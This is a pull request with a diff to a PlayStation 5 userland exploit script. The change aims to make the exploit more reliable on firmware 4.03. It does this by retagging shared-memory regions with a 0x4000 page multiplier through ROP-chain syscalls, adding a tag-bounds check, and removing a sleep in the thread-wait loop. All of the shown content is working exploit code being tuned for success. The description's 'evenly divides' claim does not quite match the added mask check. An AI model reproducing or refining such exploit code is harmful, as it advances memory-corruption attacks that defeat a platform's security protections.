### PR TITLE
Stability improvement on 4.03

### DIFF
--- a/document/en/ps5/exploit.js
+++ b/document/en/ps5/exploit.js
@@ -616,7 +616,7 @@ async function userland() {
     }
 
     async function shm_resize_tag(fd) {
-        let ret = await chain.syscall(SYS_FTRUNCATE, fd, (fd.low  * 0x1000));
+        let ret = await chain.syscall(SYS_FTRUNCATE, fd, (fd.low  * 0x4000));
         return ret;
     }
 
@@ -635,7 +635,9 @@ async function userland() {
         let ret = await chain.syscall(SYS_FSTAT, fd, stat);
 
         //debug_log("check_shm_for_tagged_size: fstat=0x" + ret + ", size=0x" + p.read8(stat.add32(OFFSET_STAT_SIZE)));
-        let tag = p.read8(stat.add32(OFFSET_STAT_SIZE)).low / 0x1000;
+        let tag = p.read8(stat.add32(OFFSET_STAT_SIZE)).low / 0x4000;
+        if (tag != (tag & 0x3ff))
+            return -1;
         //debug_log("check_shm_for_tagged_size: tag=0x" + tag.toString(16) + " | fd=0x" + fd.low.toString(16) + " | orig_fd=0x" + original_fd.low.toString(16));
 
         if (ret.low == 0 && tag != fd.low && tag != original_fd.low && tag != 0) {
@@ -674,7 +676,7 @@ async function userland() {
                 break;
             }
 
-            await sleep(1);
+            //await sleep(1);
         }
 
         // Resize shm regions


### PR DESCRIPTION
* use 0x4000 as a multiplier for tags, as that's the native page size
* when reading a tag, validate that the size evenly divides by 0x4000
* remove the sleep(1) call when waiting for threads